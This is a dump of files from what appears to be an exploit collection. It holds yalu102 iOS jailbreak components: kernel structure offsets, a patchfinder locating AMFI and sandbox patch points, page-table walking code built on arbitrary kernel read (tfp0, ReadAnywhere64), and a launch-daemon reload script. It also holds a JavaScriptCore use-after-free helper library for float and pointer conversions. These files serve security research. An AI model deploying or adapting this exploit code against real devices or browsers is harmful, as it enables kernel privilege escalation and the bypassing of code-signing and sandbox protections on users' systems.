| printf("missing offset, prob crashing\n"); 115 | } 116 | } -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/offsets.h: -------------------------------------------------------------------------------- 1 | #ifndef offsets_h 2 | #define offsets_h 3 | 4 | #import 5 | 6 | // offsets from the main kernel 0xfeedfacf 7 | extern uint64_t allproc_offset; 8 | extern uint64_t kernproc_offset; 9 | 10 | // offsets in struct proc 11 | extern uint64_t struct_proc_p_pid_offset; 12 | extern uint64_t struct_proc_task_offset; 13 | extern uint64_t struct_proc_p_uthlist_offset; 14 | extern uint64_t struct_proc_p_ucred_offset; 15 | extern uint64_t struct_proc_p_comm_offset; 16 | 17 | // offsets in struct kauth_cred 18 | extern uint64_t struct_kauth_cred_cr_ref_offset; 19 | 20 | // offsets in struct uthread 21 | extern uint64_t struct_uthread_uu_ucred_offset; 22 | extern uint64_t struct_uthread_uu_list_offset; 23 | 24 | // offsets in struct task 25 | extern uint64_t struct_task_ref_count_offset; 26 | extern uint64_t struct_task_itk_space_offset; 27 | 28 | // offsets in struct ipc_space 29 | extern uint64_t struct_ipc_space_is_table_offset; 30 | 31 | // offsets in struct ipc_port 32 | extern uint64_t struct_ipc_port_ip_kobject_offset; 33 | 34 | void init_offsets(); 35 | extern uint64_t rootvnode_offset; 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/patchfinder64.h: -------------------------------------------------------------------------------- 1 | // 2 | // patchfinder64.h 3 | // 4 | // Created by qwertyoruiop on 21/09/16. 5 | // Copyright © 2016 qwertyoruiop. All rights reserved. 6 | // 7 | 8 | #ifndef patchfinder64_h 9 | #define patchfinder64_h 10 | 11 | #import 12 | 13 | extern uint64_t text_exec_base; 14 | extern uint64_t text_exec_size; 15 | 16 | extern uint64_t prelink_exec_base; 17 | extern uint64_t prelink_exec_size; 18 | 19 | extern uint64_t whole_base; 20 | extern uint64_t whole_size; 21 | extern uint8_t* whole_dump; 22 | extern uint64_t find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg); 23 | extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target); 24 | enum Search { 25 | SearchTextExec, 26 | SearchPrelinkExec 27 | }; 28 | extern char uref; 29 | extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode); 30 | 31 | 32 | 33 | void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_); 34 | void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_); 35 | void set_dump(uint64_t whole_base_,uint64_t whole_size_, uint8_t* whole_dump_); 36 | uint64_t find_kernel_pmap(); 37 | uint64_t find_gPhysBase(); 38 | uint64_t find_flushcache(); 39 | uint64_t find_amfi_memcmpstub(); 40 | uint64_t find_memwithphys(); 41 | uint64_t find_kernel_mount(); 42 | uint64_t find_vnode_lookup(); 43 | uint64_t find_cpu_list(); 44 | uint64_t find_cpacr_write(); 45 | uint64_t find_lwvm_mapio_patch(); 46 | uint64_t find_lwvm_mapio_newj(); 47 | uint64_t find_ret_non0(); 48 | uint64_t find_ret_0(); 49 | uint64_t find_amfiret(); 50 | uint64_t find_sbops(); 51 | #define CS_VALID 0x0000001 /* dynamically valid */ 52 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 53 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 54 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 55 | 56 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 57 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 58 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 59 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 60 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 61 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 62 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 63 | 64 | #define CS_ALLOWED_MACHO 0x00ffffe 65 | 66 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 67 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 68 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 69 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 70 | 71 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 72 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 73 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 74 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 75 | #endif /* patchfinder64_h */ 76 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/patchfinder64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/patchfinder64.o -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/pte_stuff.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_h 2 | #define pte_stuff_h 3 | 4 | 5 | #define TTE_INDEX_SHIFT 3 6 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 7 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 8 | #define TTE_GET(tte, mask) (tte & mask) 9 | #define TTE_SETB(tte, mask) tte = tte | mask 10 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 11 | #define TTE_IS_VALID_MASK 0x1 12 | #define TTE_IS_TABLE_MASK 0x2 13 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 14 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 15 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 16 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 17 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 18 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 19 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 20 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 21 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 22 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 23 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 24 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 25 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 26 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 27 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 28 | 29 | typedef union VMA_4K { 30 | struct { 31 | uint64_t block_off : 12; 32 | uint64_t level3_index : 9; 33 | uint64_t level2_index : 9; 34 | uint64_t level1_index : 9; 35 | uint64_t level0_index : 9; 36 | uint64_t ttbr_selector : 16; 37 | } __attribute__((packed)) vm_info; 38 | uint64_t vmaddr; 39 | } VMA_4K; 40 | typedef union VMA_16K { 41 | struct { 42 | uint64_t block_off : 14; 43 | uint64_t level3_index : 11; 44 | uint64_t level2_index : 11; 45 | uint64_t level1_index : 11; 46 | uint64_t level0_index : 1; 47 | uint64_t ttbr_selector : 16; 48 | } __attribute__((packed)) vm_info; 49 | uint64_t vmaddr; 50 | } VMA_16K; 51 | 52 | VMA_16K vad16; 53 | VMA_4K vad4; 54 | char isvad = 0; 55 | 56 | #define TTELog NSLog 57 | vm_size_t sz = 0; 58 | 59 | void checkvad() { 60 | if (!sz) { 61 | struct utsname u = { 0 }; 62 | uname(&u); 63 | host_page_size(mach_host_self(), &sz); 64 | NSLog(@"checkvad: %x %x", sz, getpagesize()); 65 | if (strstr(u.machine, "iPad5,") == u.machine) { 66 | sz = 4096; // this is 4k but host_page_size lies to us 67 | } 68 | assert(sz); 69 | if (sz == 4096) { 70 | isvad = 1; 71 | } 72 | } 73 | } 74 | void parse_block_tte(uint64_t tte) { 75 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 76 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 77 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 78 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 79 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 80 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 81 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 82 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 83 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 84 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 85 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 86 | } 87 | 88 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 89 | 90 | checkvad(); 91 | if (!table) table = level1_table; 92 | if (!level) level = 1; 93 | 94 | vm_address_t tteaddr = 0; 95 | 96 | 97 | 98 | if (sz == 4096) { 99 | VMA_4K target_addr; 100 | target_addr.vmaddr = vmaddr; 101 | 102 | if (level == 1) { 103 | target_addr.vm_info.level1_index -= 0x1c0; 104 | } 105 | 106 | switch (level) { 107 | case 0: 108 | tteaddr = table + TTE_INDEX(target_addr, level0); 109 | break; 110 | case 1: 111 | tteaddr = table + TTE_INDEX(target_addr, level1); 112 | break; 113 | 114 | case 2: 115 | tteaddr = table + TTE_INDEX(target_addr, level2); 116 | break; 117 | 118 | case 3: 119 | tteaddr = table + TTE_INDEX(target_addr, level3); 120 | break; 121 | 122 | default: 123 | break; 124 | } 125 | 126 | } else if (sz == 4096*4) { 127 | VMA_16K target_addr; 128 | target_addr.vmaddr = vmaddr; 129 | 130 | switch (level) { 131 | case 0: 132 | tteaddr = table + TTE_INDEX(target_addr, level0); 133 | break; 134 | case 1: 135 | tteaddr = table + TTE_INDEX(target_addr, level1); 136 | break; 137 | 138 | case 2: 139 | tteaddr = table + TTE_INDEX(target_addr, level2); 140 | break; 141 | 142 | case 3: 143 | tteaddr = table + TTE_INDEX(target_addr, level3); 144 | break; 145 | 146 | default: 147 | break; 148 | } 149 | 150 | 151 | } 152 | 153 | //parse_block_tte(level1_entry); 154 | 155 | pagestuff_64_callback(tteaddr, level); 156 | 157 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 158 | 159 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 160 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 161 | } 162 | } 163 | 164 | uint64_t findphys_real(uint64_t virtaddr) { 165 | __block uint64_t physvar = 0; 166 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 167 | uint64_t tte = ReadAnywhere64(tte_addr); 168 | if (addr == 3) {\ 169 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 170 | } 171 | }, level1_table, isvad ? 1 : 2); 172 | 173 | return physvar; 174 | 175 | } 176 | uint64_t physalloc(uint64_t size) { 177 | uint64_t ret = 0; 178 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 179 | return ret; 180 | } 181 | 182 | #endif 183 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/reload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ls /etc/rc.d | while read a; do /etc/rc.d/$a; done 3 | sleep 1 4 | launchctl unload $(ls /System/Library/LaunchDaemons/ | grep -v logd | grep -v fud | grep -v ReportCrash | while read a; do printf /System/Library/LaunchDaemons/$a\ ; done) 5 | launchctl unload /System/Library/NanoLaunchDaemons 6 | sleep 1 7 | launchctl load /Library/LaunchDaemons 8 | launchctl load /System/Library/LaunchDaemons 9 | launchctl load /System/Library/NanoLaunchDaemons 10 | 11 | exit 0 12 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/yalu102/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/yalu102-master/yalu102/tar -------------------------------------------------------------------------------- /jsc_ConcatMemcpy_infoleak/ileak.html: -------------------------------------------------------------------------------- 1 | 168 | 169 | -------------------------------------------------------------------------------- /jsc_prop_enum_uaf/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2018 https://github.com/kudima 2 | 3 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 4 | 5 | 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 6 | 7 | 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 8 | 9 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 10 | -------------------------------------------------------------------------------- /jsc_prop_enum_uaf/ibin.js: -------------------------------------------------------------------------------- 1 | function Bin_Excpetion (message) { 2 | this.message = message; 3 | this.stack = (new Error()).stack; 4 | }; 5 | 6 | Bin_Excpetion.prototype = Object.create(Error.prototype); 7 | Bin_Excpetion.prototype.name = "BinHelper_Exception"; 8 | 9 | // f64 could be any value except NaN (0x7ff exponent and non zero mantissa) 10 | // in which case it is always encoded as 0x7ff8000000000000. 11 | // We will throw when attempting to encode NaN to a 64-bit value 12 | var BinHelper = function() { 13 | this.buf = new ArrayBuffer(8); 14 | this.f64 = new Float64Array(this.buf); 15 | this.u32 = new Uint32Array(this.buf); 16 | this.u16 = new Uint16Array(this.buf); 17 | this.u8 = new Uint8Array(this.buf); 18 | } 19 | 20 | BinHelper.prototype.asciiToAddr = function (str) { 21 | 22 | for (var i=0; i<8; i++) { 23 | if (i < str.length) 24 | this.u8[i] = str.charCodeAt(i); 25 | else 26 | this.u8[i] = 0; 27 | } 28 | 29 | this.assertNaN(); 30 | return this.f64[0]; 31 | } 32 | 33 | BinHelper.prototype.uint8ArrToAddr = function (arr) { 34 | 35 | for (var i=0; i<8; i++) { 36 | if (i < arr.length) 37 | this.u8[i] = arr[i]; 38 | else 39 | this.u8[i] = 0; 40 | } 41 | 42 | this.assertNaN(); 43 | return this.f64[0]; 44 | } 45 | 46 | BinHelper.prototype.uint8ArrToU32 = function (arr) { 47 | 48 | for (var i=0; i<4; i++) { 49 | if (i < arr.length) 50 | this.u8[i] = arr[i]; 51 | else 52 | this.u8[i] = 0; 53 | } 54 | 55 | return this.u32[0]; 56 | } 57 | 58 | BinHelper.prototype.assertNaN = function() { 59 | 60 | let hi = this.u32[1]; 61 | let lo = this.u32[0]; 62 | 63 | if ( ((hi & 0x7ff00000) == 0x7ff00000) && lo != 0 ) 64 | throw new Bin_Excpetion("NaNs are not allowed"); 65 | } 66 | 67 | BinHelper.prototype.toF64 = function (hi, lo) { 68 | 69 | this.u32[1] = hi; 70 | this.u32[0] = lo; 71 | 72 | this.assertNaN(); 73 | return this.f64[0]; 74 | } 75 | 76 | // for values greater then 0x0001000000000000 77 | // we can place those into properties as JSValue, 78 | // This method takes into account the adjustments made 79 | // by jsc, so we get the actualy value we want as property 80 | BinHelper.prototype.toF64JSValue = function (hi, lo) { 81 | 82 | if (hi < 0x10000) { 83 | throw new Bin_Excpetion("toF64JSValue failed hi < 0x10000"); 84 | } 85 | 86 | this.u32[1] = hi - 0x10000; 87 | this.u32[0] = lo; 88 | 89 | this.assertNaN(); 90 | return this.f64[0]; 91 | } 92 | 93 | BinHelper.prototype.f64JSValue = function (ptr) { 94 | 95 | var hi = this.f64hi(ptr); 96 | var lo = this.f64lo(ptr); 97 | 98 | return this.toF64JSValue(hi, lo); 99 | } 100 | 101 | BinHelper.prototype.f64lo = function (f64) { 102 | this.f64[0] = f64; 103 | return this.u32[0]; 104 | } 105 | 106 | BinHelper.prototype.f64hi = function (f64) { 107 | this.f64[0] = f64; 108 | return this.u32[1]; 109 | } 110 | 111 | BinHelper.prototype.f64ToStr = function (f64) { 112 | 113 | this.f64[0] = f64; 114 | this.assertNaN(); 115 | 116 | var prefix = ''; 117 | let i = 24; 118 | 119 | if (this.u32[0] <= 0xfffffff) 120 | prefix += '0'; 121 | 122 | while ((this.u32[0] >> i) == 0) { 123 | i -= 4; 124 | prefix += '0'; 125 | if (i == 0) 126 | break; 127 | } 128 | 129 | return this.u32[1].toString(0x10) + prefix + this.u32[0].toString(0x10); 130 | } 131 | 132 | BinHelper.prototype.u16StrToUint8Array = function (str) { 133 | 134 | var bytes = new Uint8Array(str.length*2); 135 | 136 | for (var i=0; i> 8; 140 | } 141 | 142 | return bytes; 143 | } 144 | 145 | BinHelper.prototype.asciiToUint8Array = function (str) { 146 | 147 | var bytes = new Uint8Array(str.length); 148 | 149 | for (var i=0; i arr.byteLength) 184 | return -1; 185 | 186 | function atPos(pos) { 187 | for (let j=0; j arr.byteLength) 207 | return -1; 208 | 209 | function atPos(pos) { 210 | for (let j=0; j0; i--) { 220 | if (atPos(i)) 221 | return i; 222 | } 223 | 224 | return -1; 225 | } 226 | 227 | BinHelper.prototype.__lshiftF64 = function (shift) { 228 | 229 | this.u16[3] = this.u16[3] << shift; 230 | 231 | let extra = this.u16[2] & (0xffff << (16-shift)); 232 | extra = extra >> (16 - shift); 233 | this.u16[3] = this.u16[3] | extra; 234 | this.u16[2] = this.u16[2] << shift; 235 | 236 | extra = this.u16[1] & (0xffff << (16-shift)); 237 | extra = extra >> (16 - shift); 238 | this.u16[2] = this.u16[2] | extra; 239 | this.u16[1] = this.u16[1] << shift; 240 | 241 | extra = this.u16[0] & (0xffff << (16-shift)); 242 | extra = extra >> (16 - shift); 243 | this.u16[1] = this.u16[1] | extra; 244 | this.u16[0] = this.u16[0] << shift; 245 | } 246 | 247 | BinHelper.prototype.lshiftF64 = function (f64, shift) { 248 | 249 | this.f64[0] = f64; 250 | 251 | if (shift <= 16) { 252 | this.__lshiftF64(shift); 253 | return this.f64[0]; 254 | } 255 | 256 | while (shift > 16) { 257 | this.__lshiftF64(16); 258 | shift -= 16; 259 | } 260 | 261 | this.__lshiftF64(shift); 262 | 263 | return this.f64[0]; 264 | } 265 | 266 | 267 | BinHelper.prototype.f64OrLo = function(f64, mask) { 268 | this.f64[0] = f64; 269 | this.u32[0] |= mask; 270 | return this.f64[0]; 271 | } 272 | 273 | BinHelper.prototype.f64Xor = function (f1, f2) { 274 | 275 | var hi1 = this.f64hi(f1); 276 | var lo1 = this.f64lo(f1); 277 | 278 | var hi2 = this.f64hi(f2); 279 | var lo2 = this.f64lo(f2); 280 | 281 | return this.toF64(hi1 ^ hi2, lo1 ^ lo2); 282 | } 283 | 284 | let bh = new BinHelper(); 285 | 286 | // vim: tabstop=4:noexpandtab:shiftwidth=4 287 | --------------------------------------------------------------------------------